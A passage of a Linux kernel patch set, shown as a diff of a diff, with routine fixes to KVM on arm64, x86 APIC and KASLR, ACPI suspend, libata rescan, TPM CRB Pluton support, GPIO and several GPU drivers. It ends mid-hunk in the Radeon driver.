+diff --git a/arch/arm64/include/asm/sysreg.h b/arch/arm64/include/asm/sysreg.h
+index 7d301700d1a93..3a448ab0924b3 100644
+--- a/arch/arm64/include/asm/sysreg.h
++++ b/arch/arm64/include/asm/sysreg.h
+@@ -111,8 +111,14 @@
+ #define SB_BARRIER_INSN			__SYS_BARRIER_INSN(0, 7, 31)
+ 
+ #define SYS_DC_ISW			sys_insn(1, 0, 7, 6, 2)
++#define SYS_DC_IGSW			sys_insn(1, 0, 7, 6, 4)
++#define SYS_DC_IGDSW			sys_insn(1, 0, 7, 6, 6)
+ #define SYS_DC_CSW			sys_insn(1, 0, 7, 10, 2)
++#define SYS_DC_CGSW			sys_insn(1, 0, 7, 10, 4)
++#define SYS_DC_CGDSW			sys_insn(1, 0, 7, 10, 6)
+ #define SYS_DC_CISW			sys_insn(1, 0, 7, 14, 2)
++#define SYS_DC_CIGSW			sys_insn(1, 0, 7, 14, 4)
++#define SYS_DC_CIGDSW			sys_insn(1, 0, 7, 14, 6)
+ 
+ /*
+  * Automatically generated definitions for system registers, the
+diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
+index 2208d79b18dea..081aca8f432ef 100644
+--- a/arch/arm64/kvm/hyp/include/hyp/switch.h
++++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
+@@ -81,7 +81,12 @@ static inline void __activate_traps_common(struct kvm_vcpu *vcpu)
+ 	 * EL1 instead of being trapped to EL2.
+ 	 */
+ 	if (kvm_arm_support_pmu_v3()) {
++		struct kvm_cpu_context *hctxt;
++
+ 		write_sysreg(0, pmselr_el0);
++
++		hctxt = &this_cpu_ptr(&kvm_host_data)->host_ctxt;
++		ctxt_sys_reg(hctxt, PMUSERENR_EL0) = read_sysreg(pmuserenr_el0);
+ 		write_sysreg(ARMV8_PMU_USERENR_MASK, pmuserenr_el0);
+ 	}
+ 
+@@ -105,8 +110,12 @@ static inline void __deactivate_traps_common(struct kvm_vcpu *vcpu)
+ 	write_sysreg(vcpu->arch.mdcr_el2_host, mdcr_el2);
+ 
+ 	write_sysreg(0, hstr_el2);
+-	if (kvm_arm_support_pmu_v3())
+-		write_sysreg(0, pmuserenr_el0);
++	if (kvm_arm_support_pmu_v3()) {
++		struct kvm_cpu_context *hctxt;
++
++		hctxt = &this_cpu_ptr(&kvm_host_data)->host_ctxt;
++		write_sysreg(ctxt_sys_reg(hctxt, PMUSERENR_EL0), pmuserenr_el0);
++	}
+ 
+ 	if (cpus_have_final_cap(ARM64_SME)) {
+ 		sysreg_clear_set_s(SYS_HFGRTR_EL2, 0,
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index 37e74ca4dad85..f2f3bf4a04b0b 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -446,6 +446,7 @@ int vgic_lazy_init(struct kvm *kvm)
+ int kvm_vgic_map_resources(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
++	enum vgic_type type;
+ 	gpa_t dist_base;
+ 	int ret = 0;
+ 
+@@ -460,10 +461,13 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	if (!irqchip_in_kernel(kvm))
+ 		goto out;
+ 
+-	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V2)
++	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V2) {
+ 		ret = vgic_v2_map_resources(kvm);
+-	else
++		type = VGIC_V2;
++	} else {
+ 		ret = vgic_v3_map_resources(kvm);
++		type = VGIC_V3;
++	}
+ 
+ 	if (ret) {
+ 		__kvm_vgic_destroy(kvm);
+@@ -473,8 +477,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	dist_base = dist->vgic_dist_base;
+ 	mutex_unlock(&kvm->arch.config_lock);
+ 
+-	ret = vgic_register_dist_iodev(kvm, dist_base,
+-				       kvm_vgic_global_state.type);
++	ret = vgic_register_dist_iodev(kvm, dist_base, type);
+ 	if (ret) {
+ 		kvm_err("Unable to register VGIC dist MMIO regions\n");
+ 		kvm_vgic_destroy(kvm);
+diff --git a/arch/s390/purgatory/Makefile b/arch/s390/purgatory/Makefile
+index d237bc6841cb8..4cbf306b8181f 100644
+--- a/arch/s390/purgatory/Makefile
++++ b/arch/s390/purgatory/Makefile
+@@ -26,6 +26,7 @@ KBUILD_CFLAGS += -Wno-pointer-sign -Wno-sign-compare
+ KBUILD_CFLAGS += -fno-zero-initialized-in-bss -fno-builtin -ffreestanding
+ KBUILD_CFLAGS += -c -MD -Os -m64 -msoft-float -fno-common
+ KBUILD_CFLAGS += -fno-stack-protector
++KBUILD_CFLAGS += -DDISABLE_BRANCH_PROFILING
+ KBUILD_CFLAGS += $(CLANG_FLAGS)
+ KBUILD_CFLAGS += $(call cc-option,-fno-PIE)
+ KBUILD_AFLAGS := $(filter-out -DCC_USING_EXPOLINE,$(KBUILD_AFLAGS))
+diff --git a/arch/x86/kernel/apic/x2apic_phys.c b/arch/x86/kernel/apic/x2apic_phys.c
+index 6bde05a86b4ed..896bc41cb2ba7 100644
+--- a/arch/x86/kernel/apic/x2apic_phys.c
++++ b/arch/x86/kernel/apic/x2apic_phys.c
+@@ -97,7 +97,10 @@ static void init_x2apic_ldr(void)
+ 
+ static int x2apic_phys_probe(void)
+ {
+-	if (x2apic_mode && (x2apic_phys || x2apic_fadt_phys()))
++	if (!x2apic_mode)
++		return 0;
++
++	if (x2apic_phys || x2apic_fadt_phys())
+ 		return 1;
+ 
+ 	return apic == &apic_x2apic_phys;
+diff --git a/arch/x86/mm/kaslr.c b/arch/x86/mm/kaslr.c
+index 557f0fe25dff4..37db264866b64 100644
+--- a/arch/x86/mm/kaslr.c
++++ b/arch/x86/mm/kaslr.c
+@@ -172,10 +172,10 @@ void __meminit init_trampoline_kaslr(void)
+ 		set_p4d(p4d_tramp,
+ 			__p4d(_KERNPG_TABLE | __pa(pud_page_tramp)));
+ 
+-		set_pgd(&trampoline_pgd_entry,
+-			__pgd(_KERNPG_TABLE | __pa(p4d_page_tramp)));
++		trampoline_pgd_entry =
++			__pgd(_KERNPG_TABLE | __pa(p4d_page_tramp));
+ 	} else {
+-		set_pgd(&trampoline_pgd_entry,
+-			__pgd(_KERNPG_TABLE | __pa(pud_page_tramp)));
++		trampoline_pgd_entry =
++			__pgd(_KERNPG_TABLE | __pa(pud_page_tramp));
+ 	}
+ }
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index 99620428ad785..db6053a22e866 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -2478,7 +2478,7 @@ out_image:
+ 	}
+ 
+ 	if (bpf_jit_enable > 1)
+-		bpf_jit_dump(prog->len, proglen, pass + 1, image);
++		bpf_jit_dump(prog->len, proglen, pass + 1, rw_image);
+ 
+ 	if (image) {
+ 		if (!prog->is_func || extra_pass) {
+diff --git a/drivers/acpi/acpica/achware.h b/drivers/acpi/acpica/achware.h
+index 6f2787506b50c..c1b6e7bf4fcb5 100644
+--- a/drivers/acpi/acpica/achware.h
++++ b/drivers/acpi/acpica/achware.h
+@@ -101,8 +101,6 @@ acpi_status
+ acpi_hw_get_gpe_status(struct acpi_gpe_event_info *gpe_event_info,
+ 		       acpi_event_status *event_status);
+ 
+-acpi_status acpi_hw_disable_all_gpes(void);
+-
+ acpi_status acpi_hw_enable_all_runtime_gpes(void);
+ 
+ acpi_status acpi_hw_enable_all_wakeup_gpes(void);
+diff --git a/drivers/acpi/sleep.c b/drivers/acpi/sleep.c
+index 4ca6672512722..539c12fbd2f14 100644
+--- a/drivers/acpi/sleep.c
++++ b/drivers/acpi/sleep.c
+@@ -636,11 +636,19 @@ static int acpi_suspend_enter(suspend_state_t pm_state)
+ 	}
+ 
+ 	/*
+-	 * Disable and clear GPE status before interrupt is enabled. Some GPEs
+-	 * (like wakeup GPE) haven't handler, this can avoid such GPE misfire.
+-	 * acpi_leave_sleep_state will reenable specific GPEs later
++	 * Disable all GPE and clear their status bits before interrupts are
++	 * enabled. Some GPEs (like wakeup GPEs) have no handlers and this can
++	 * prevent them from producing spurious interrups.
++	 *
++	 * acpi_leave_sleep_state() will reenable specific GPEs later.
++	 *
++	 * Because this code runs on one CPU with disabled interrupts (all of
++	 * the other CPUs are offline at this time), it need not acquire any
++	 * sleeping locks which may trigger an implicit preemption point even
++	 * if there is no contention, so avoid doing that by using a low-level
++	 * library routine here.
+ 	 */
+-	acpi_disable_all_gpes();
++	acpi_hw_disable_all_gpes();
+ 	/* Allow EC transactions to happen. */
+ 	acpi_ec_unblock_transactions();
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index a5ea144722fa3..0ba0c3d1613f1 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5313,7 +5313,7 @@ struct ata_port *ata_port_alloc(struct ata_host *host)
+ 
+ 	mutex_init(&ap->scsi_scan_mutex);
+ 	INIT_DELAYED_WORK(&ap->hotplug_task, ata_scsi_hotplug);
+-	INIT_WORK(&ap->scsi_rescan_task, ata_scsi_dev_rescan);
++	INIT_DELAYED_WORK(&ap->scsi_rescan_task, ata_scsi_dev_rescan);
+ 	INIT_LIST_HEAD(&ap->eh_done_q);
+ 	init_waitqueue_head(&ap->eh_wait_q);
+ 	init_completion(&ap->park_req_pending);
+@@ -5919,6 +5919,7 @@ static void ata_port_detach(struct ata_port *ap)
+ 	WARN_ON(!(ap->pflags & ATA_PFLAG_UNLOADED));
+ 
+ 	cancel_delayed_work_sync(&ap->hotplug_task);
++	cancel_delayed_work_sync(&ap->scsi_rescan_task);
+ 
+  skip_eh:
+ 	/* clean up zpodd on port removal */
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 08e11bc312c28..a3ae5fc2a42fc 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -2973,7 +2973,7 @@ static int ata_eh_revalidate_and_attach(struct ata_link *link,
+ 			ehc->i.flags |= ATA_EHI_SETMODE;
+ 
+ 			/* schedule the scsi_rescan_device() here */
+-			schedule_work(&(ap->scsi_rescan_task));
++			schedule_delayed_work(&ap->scsi_rescan_task, 0);
+ 		} else if (dev->class == ATA_DEV_UNKNOWN &&
+ 			   ehc->tries[dev->devno] &&
+ 			   ata_class_enabled(ehc->classes[dev->devno])) {
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 39e1ff9b686b9..9c0052d28078a 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -4601,10 +4601,11 @@ int ata_scsi_user_scan(struct Scsi_Host *shost, unsigned int channel,
+ void ata_scsi_dev_rescan(struct work_struct *work)
+ {
+ 	struct ata_port *ap =
+-		container_of(work, struct ata_port, scsi_rescan_task);
++		container_of(work, struct ata_port, scsi_rescan_task.work);
+ 	struct ata_link *link;
+ 	struct ata_device *dev;
+ 	unsigned long flags;
++	bool delay_rescan = false;
+ 
+ 	mutex_lock(&ap->scsi_scan_mutex);
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -4618,6 +4619,21 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			if (scsi_device_get(sdev))
+ 				continue;
+ 
++			/*
++			 * If the rescan work was scheduled because of a resume
++			 * event, the port is already fully resumed, but the
++			 * SCSI device may not yet be fully resumed. In such
++			 * case, executing scsi_rescan_device() may cause a
++			 * deadlock with the PM code on device_lock(). Prevent
++			 * this by giving up and retrying rescan after a short
++			 * delay.
++			 */
++			delay_rescan = sdev->sdev_gendev.power.is_suspended;
++			if (delay_rescan) {
++				scsi_device_put(sdev);
++				break;
++			}
++
+ 			spin_unlock_irqrestore(ap->lock, flags);
+ 			scsi_rescan_device(&(sdev->sdev_gendev));
+ 			scsi_device_put(sdev);
+@@ -4627,4 +4643,8 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ 	mutex_unlock(&ap->scsi_scan_mutex);
++
++	if (delay_rescan)
++		schedule_delayed_work(&ap->scsi_rescan_task,
++				      msecs_to_jiffies(5));
+ }
+diff --git a/drivers/base/regmap/regmap-spi-avmm.c b/drivers/base/regmap/regmap-spi-avmm.c
+index 4c2b94b3e30be..6af692844c196 100644
+--- a/drivers/base/regmap/regmap-spi-avmm.c
++++ b/drivers/base/regmap/regmap-spi-avmm.c
+@@ -660,7 +660,7 @@ static const struct regmap_bus regmap_spi_avmm_bus = {
+ 	.reg_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.max_raw_read = SPI_AVMM_VAL_SIZE * MAX_READ_CNT,
+-	.max_raw_write = SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
++	.max_raw_write = SPI_AVMM_REG_SIZE + SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
+ 	.free_context = spi_avmm_bridge_ctx_free,
+ };
+ 
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index c45d09a9a9421..e8cb914223cdf 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -2194,6 +2194,7 @@ static void null_destroy_dev(struct nullb *nullb)
+ 	struct nullb_device *dev = nullb->dev;
+ 
+ 	null_del_dev(nullb);
++	null_free_device_storage(dev, false);
+ 	null_free_dev(dev);
+ }
+ 
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 16fc481d60950..916f4ff246c14 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -98,6 +98,8 @@ struct crb_priv {
+ 	u8 __iomem *rsp;
+ 	u32 cmd_size;
+ 	u32 smc_func_id;
++	u32 __iomem *pluton_start_addr;
++	u32 __iomem *pluton_reply_addr;
+ };
+ 
+ struct tpm2_crb_smc {
+@@ -108,6 +110,11 @@ struct tpm2_crb_smc {
+ 	u32 smc_func_id;
+ };
+ 
++struct tpm2_crb_pluton {
++	u64 start_addr;
++	u64 reply_addr;
++};
++
+ static bool crb_wait_for_reg_32(u32 __iomem *reg, u32 mask, u32 value,
+ 				unsigned long timeout)
+ {
+@@ -127,6 +134,25 @@ static bool crb_wait_for_reg_32(u32 __iomem *reg, u32 mask, u32 value,
+ 	return ((ioread32(reg) & mask) == value);
+ }
+ 
++static int crb_try_pluton_doorbell(struct crb_priv *priv, bool wait_for_complete)
++{
++	if (priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON)
++		return 0;
++
++	if (!crb_wait_for_reg_32(priv->pluton_reply_addr, ~0, 1, TPM2_TIMEOUT_C))
++		return -ETIME;
++
++	iowrite32(1, priv->pluton_start_addr);
++	if (wait_for_complete == false)
++		return 0;
++
++	if (!crb_wait_for_reg_32(priv->pluton_start_addr,
++				 0xffffffff, 0, 200))
++		return -ETIME;
++
++	return 0;
++}
++
+ /**
+  * __crb_go_idle - request tpm crb device to go the idle state
+  *
+@@ -145,6 +171,8 @@ static bool crb_wait_for_reg_32(u32 __iomem *reg, u32 mask, u32 value,
+  */
+ static int __crb_go_idle(struct device *dev, struct crb_priv *priv)
+ {
++	int rc;
++
+ 	if ((priv->sm == ACPI_TPM2_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC))
+@@ -152,6 +180,10 @@ static int __crb_go_idle(struct device *dev, struct crb_priv *priv)
+ 
+ 	iowrite32(CRB_CTRL_REQ_GO_IDLE, &priv->regs_t->ctrl_req);
+ 
++	rc = crb_try_pluton_doorbell(priv, true);
++	if (rc)
++		return rc;
++
+ 	if (!crb_wait_for_reg_32(&priv->regs_t->ctrl_req,
+ 				 CRB_CTRL_REQ_GO_IDLE/* mask */,
+ 				 0, /* value */
+@@ -188,12 +220,19 @@ static int crb_go_idle(struct tpm_chip *chip)
+  */
+ static int __crb_cmd_ready(struct device *dev, struct crb_priv *priv)
+ {
++	int rc;
++
+ 	if ((priv->sm == ACPI_TPM2_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_START_METHOD) ||
+ 	    (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC))
+ 		return 0;
+ 
+ 	iowrite32(CRB_CTRL_REQ_CMD_READY, &priv->regs_t->ctrl_req);
++
++	rc = crb_try_pluton_doorbell(priv, true);
++	if (rc)
++		return rc;
++
+ 	if (!crb_wait_for_reg_32(&priv->regs_t->ctrl_req,
+ 				 CRB_CTRL_REQ_CMD_READY /* mask */,
+ 				 0, /* value */
+@@ -371,6 +410,10 @@ static int crb_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 		return -E2BIG;
+ 	}
+ 
++	/* Seems to be necessary for every command */
++	if (priv->sm == ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON)
++		__crb_cmd_ready(&chip->dev, priv);
++
+ 	memcpy_toio(priv->cmd, buf, len);
+ 
+ 	/* Make sure that cmd is populated before issuing start. */
+@@ -394,7 +437,10 @@ static int crb_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 		rc = tpm_crb_smc_start(&chip->dev, priv->smc_func_id);
+ 	}
+ 
+-	return rc;
++	if (rc)
++		return rc;
++
++	return crb_try_pluton_doorbell(priv, false);
+ }
+ 
+ static void crb_cancel(struct tpm_chip *chip)
+@@ -524,15 +570,18 @@ static int crb_map_io(struct acpi_device *device, struct crb_priv *priv,
+ 		return ret;
+ 	acpi_dev_free_resource_list(&acpi_resource_list);
+ 
+-	if (resource_type(iores_array) != IORESOURCE_MEM) {
+-		dev_err(dev, FW_BUG "TPM2 ACPI table does not define a memory resource\n");
+-		return -EINVAL;
+-	} else if (resource_type(iores_array + TPM_CRB_MAX_RESOURCES) ==
+-		IORESOURCE_MEM) {
+-		dev_warn(dev, "TPM2 ACPI table defines too many memory resources\n");
+-		memset(iores_array + TPM_CRB_MAX_RESOURCES,
+-		       0, sizeof(*iores_array));
+-		iores_array[TPM_CRB_MAX_RESOURCES].flags = 0;
++	/* Pluton doesn't appear to define ACPI memory regions */
++	if (priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		if (resource_type(iores_array) != IORESOURCE_MEM) {
++			dev_err(dev, FW_BUG "TPM2 ACPI table does not define a memory resource\n");
++			return -EINVAL;
++		} else if (resource_type(iores_array + TPM_CRB_MAX_RESOURCES) ==
++			   IORESOURCE_MEM) {
++			dev_warn(dev, "TPM2 ACPI table defines too many memory resources\n");
++			memset(iores_array + TPM_CRB_MAX_RESOURCES,
++			       0, sizeof(*iores_array));
++			iores_array[TPM_CRB_MAX_RESOURCES].flags = 0;
++		}
+ 	}
+ 
+ 	iores = NULL;
+@@ -656,6 +705,22 @@ out_relinquish_locality:
+ 	return ret;
+ }
+ 
++static int crb_map_pluton(struct device *dev, struct crb_priv *priv,
++	       struct acpi_table_tpm2 *buf, struct tpm2_crb_pluton *crb_pluton)
++{
++	priv->pluton_start_addr = crb_map_res(dev, NULL, NULL,
++					      crb_pluton->start_addr, 4);
++	if (IS_ERR(priv->pluton_start_addr))
++		return PTR_ERR(priv->pluton_start_addr);
++
++	priv->pluton_reply_addr = crb_map_res(dev, NULL, NULL,
++					      crb_pluton->reply_addr, 4);
++	if (IS_ERR(priv->pluton_reply_addr))
++		return PTR_ERR(priv->pluton_reply_addr);
++
++	return 0;
++}
++
+ static int crb_acpi_add(struct acpi_device *device)
+ {
+ 	struct acpi_table_tpm2 *buf;
+@@ -663,6 +728,7 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	struct tpm_chip *chip;
+ 	struct device *dev = &device->dev;
+ 	struct tpm2_crb_smc *crb_smc;
++	struct tpm2_crb_pluton *crb_pluton;
+ 	acpi_status status;
+ 	u32 sm;
+ 	int rc;
+@@ -700,6 +766,20 @@ static int crb_acpi_add(struct acpi_device *device)
+ 		priv->smc_func_id = crb_smc->smc_func_id;
+ 	}
+ 
++	if (sm == ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		if (buf->header.length < (sizeof(*buf) + sizeof(*crb_pluton))) {
++			dev_err(dev,
++				FW_BUG "TPM2 ACPI table has wrong size %u for start method type %d\n",
++				buf->header.length,
++				ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON);
++			return -EINVAL;
++		}
++		crb_pluton = ACPI_ADD_PTR(struct tpm2_crb_pluton, buf, sizeof(*buf));
++		rc = crb_map_pluton(dev, priv, buf, crb_pluton);
++		if (rc)
++			return rc;
++	}
++
+ 	priv->sm = sm;
+ 	priv->hid = acpi_device_hid(device);
+ 
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index e05d2b227de37..55f6ff1e05aa5 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -772,7 +772,9 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 		wake_up_interruptible(&priv->int_queue);
+ 
+ 	/* Clear interrupts handled with TPM_EOI */
++	tpm_tis_request_locality(chip, 0);
+ 	rc = tpm_tis_write32(priv, TPM_INT_STATUS(priv->locality), interrupt);
++	tpm_tis_relinquish_locality(chip, 0);
+ 	if (rc < 0)
+ 		return IRQ_NONE;
+ 
+diff --git a/drivers/gpio/gpio-sifive.c b/drivers/gpio/gpio-sifive.c
+index bc5660f61c570..0f1e1226ebbe8 100644
+--- a/drivers/gpio/gpio-sifive.c
++++ b/drivers/gpio/gpio-sifive.c
+@@ -221,8 +221,12 @@ static int sifive_gpio_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	for (i = 0; i < ngpio; i++)
+-		chip->irq_number[i] = platform_get_irq(pdev, i);
++	for (i = 0; i < ngpio; i++) {
++		ret = platform_get_irq(pdev, i);
++		if (ret < 0)
++			return ret;
++		chip->irq_number[i] = ret;
++	}
+ 
+ 	ret = bgpio_init(&chip->gc, dev, 4,
+ 			 chip->base + SIFIVE_GPIO_INPUT_VAL,
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index 5974cfc61b417..6d3e3454a6ed6 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -1650,7 +1650,7 @@ static void gpiochip_irqchip_remove(struct gpio_chip *gc)
+ 	}
+ 
+ 	/* Remove all IRQ mappings and delete the domain */
+-	if (gc->irq.domain) {
++	if (!gc->irq.domain_is_allocated_externally && gc->irq.domain) {
+ 		unsigned int irq;
+ 
+ 		for (offset = 0; offset < gc->ngpio; offset++) {
+@@ -1696,6 +1696,15 @@ int gpiochip_irqchip_add_domain(struct gpio_chip *gc,
+ 
+ 	gc->to_irq = gpiochip_to_irq;
+ 	gc->irq.domain = domain;
++	gc->irq.domain_is_allocated_externally = true;
++
++	/*
++	 * Using barrier() here to prevent compiler from reordering
++	 * gc->irq.initialized before adding irqdomain.
++	 */
++	barrier();
++
++	gc->irq.initialized = true;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 53687de6c0530..91c308cf27eb2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -348,6 +348,35 @@ static inline bool is_dc_timing_adjust_needed(struct dm_crtc_state *old_state,
+ 		return false;
+ }
+ 
++/**
++ * update_planes_and_stream_adapter() - Send planes to be updated in DC
++ *
++ * DC has a generic way to update planes and stream via
++ * dc_update_planes_and_stream function; however, DM might need some
++ * adjustments and preparation before calling it. This function is a wrapper
++ * for the dc_update_planes_and_stream that does any required configuration
++ * before passing control to DC.
++ */
++static inline bool update_planes_and_stream_adapter(struct dc *dc,
++						    int update_type,
++						    int planes_count,
++						    struct dc_stream_state *stream,
++						    struct dc_stream_update *stream_update,
++						    struct dc_surface_update *array_of_surface_update)
++{
++	/*
++	 * Previous frame finished and HW is ready for optimization.
++	 */
++	if (update_type == UPDATE_TYPE_FAST)
++		dc_post_update_surfaces_to_stream(dc);
++
++	return dc_update_planes_and_stream(dc,
++					   array_of_surface_update,
++					   planes_count,
++					   stream,
++					   stream_update);
++}
++
+ /**
+  * dm_pflip_high_irq() - Handle pageflip interrupt
+  * @interrupt_params: ignored
+@@ -2632,10 +2661,13 @@ static void dm_gpureset_commit_state(struct dc_state *dc_state,
+ 			bundle->surface_updates[m].surface->force_full_update =
+ 				true;
+ 		}
+-		dc_commit_updates_for_stream(
+-			dm->dc, bundle->surface_updates,
+-			dc_state->stream_status->plane_count,
+-			dc_state->streams[k], &bundle->stream_update, dc_state);
++
++		update_planes_and_stream_adapter(dm->dc,
++					 UPDATE_TYPE_FULL,
++					 dc_state->stream_status->plane_count,
++					 dc_state->streams[k],
++					 &bundle->stream_update,
++					 bundle->surface_updates);
+ 	}
+ 
+ cleanup:
+@@ -7870,6 +7902,12 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 		if (acrtc_state->abm_level != dm_old_crtc_state->abm_level)
+ 			bundle->stream_update.abm_level = &acrtc_state->abm_level;
+ 
++		mutex_lock(&dm->dc_lock);
++		if ((acrtc_state->update_type > UPDATE_TYPE_FAST) &&
++				acrtc_state->stream->link->psr_settings.psr_allow_active)
++			amdgpu_dm_psr_disable(acrtc_state->stream);
++		mutex_unlock(&dm->dc_lock);
++
+ 		/*
+ 		 * If FreeSync state on the stream has changed then we need to
+ 		 * re-adjust the min/max bounds now that DC doesn't handle this
+@@ -7883,16 +7921,12 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			spin_unlock_irqrestore(&pcrtc->dev->event_lock, flags);
+ 		}
+ 		mutex_lock(&dm->dc_lock);
+-		if ((acrtc_state->update_type > UPDATE_TYPE_FAST) &&
+-				acrtc_state->stream->link->psr_settings.psr_allow_active)
+-			amdgpu_dm_psr_disable(acrtc_state->stream);
+-
+-		dc_commit_updates_for_stream(dm->dc,
+-						     bundle->surface_updates,
+-						     planes_count,
+-						     acrtc_state->stream,
+-						     &bundle->stream_update,
+-						     dc_state);
++		update_planes_and_stream_adapter(dm->dc,
++					 acrtc_state->update_type,
++					 planes_count,
++					 acrtc_state->stream,
++					 &bundle->stream_update,
++					 bundle->surface_updates);
+ 
+ 		/**
+ 		 * Enable or disable the interrupts on the backend.
+@@ -8334,12 +8368,11 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 
+ 
+ 		mutex_lock(&dm->dc_lock);
+-		dc_commit_updates_for_stream(dm->dc,
+-						     dummy_updates,
+-						     status->plane_count,
+-						     dm_new_crtc_state->stream,
+-						     &stream_update,
+-						     dc_state);
++		dc_update_planes_and_stream(dm->dc,
++					    dummy_updates,
++					    status->plane_count,
++					    dm_new_crtc_state->stream,
++					    &stream_update);
+ 		mutex_unlock(&dm->dc_lock);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_g2d.c b/drivers/gpu/drm/exynos/exynos_drm_g2d.c
+index 471fd6c8135f2..27613abeed961 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_g2d.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_g2d.c
+@@ -1335,7 +1335,7 @@ int exynos_g2d_exec_ioctl(struct drm_device *drm_dev, void *data,
+ 	/* Let the runqueue know that there is work to do. */
+ 	queue_work(g2d->g2d_workq, &g2d->runqueue_work);
+ 
+-	if (runqueue_node->async)
++	if (req->async)
+ 		goto out;
+ 
+ 	wait_for_completion(&runqueue_node->complete);
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_vidi.c b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+index 4d56c8c799c5a..f5e1adfcaa514 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_vidi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+@@ -469,8 +469,6 @@ static int vidi_remove(struct platform_device *pdev)
+ 	if (ctx->raw_edid != (struct edid *)fake_edid_info) {
+ 		kfree(ctx->raw_edid);
+ 		ctx->raw_edid = NULL;
+-
+-		return -EINVAL;
+ 	}
+ 
+ 	component_del(&pdev->dev, &vidi_component_ops);
+diff --git a/drivers/gpu/drm/radeon/radeon_gem.c b/drivers/gpu/drm/radeon/radeon_gem.c
+index 261fcbae88d78..75d79c3110389 100644
+--- a/drivers/gpu/drm/radeon/radeon_gem.c
++++ b/drivers/gpu/drm/radeon/radeon_gem.c
+@@ -459,7 +459,6 @@ int radeon_gem_set_domain_ioctl(struct drm_device *dev, void *data,
+ 	struct radeon_device *rdev = dev->dev_private;
+ 	struct drm_radeon_gem_set_domain *args = data;
+ 	struct drm_gem_object *gobj;
+-	struct radeon_bo *robj;
+ 	int r;
+ 
+ 	/* for now if someone requests domain CPU -
+@@ -472,13 +471,12 @@ int radeon_gem_set_domain_ioctl(struct drm_device *dev, void *data,
+ 		up_read(&rdev->exclusive_lock);
+ 		return -ENOENT;
+ 	}
+-	robj = gem_to_radeon_bo(gobj);
+ 
+ 	r = radeon_gem_set_domain(gobj, args->read_domains, args->write_domain);
+ 
+ 	drm_gem_object_put(gobj);
+ 	up_read(&rdev->exclusive_lock);
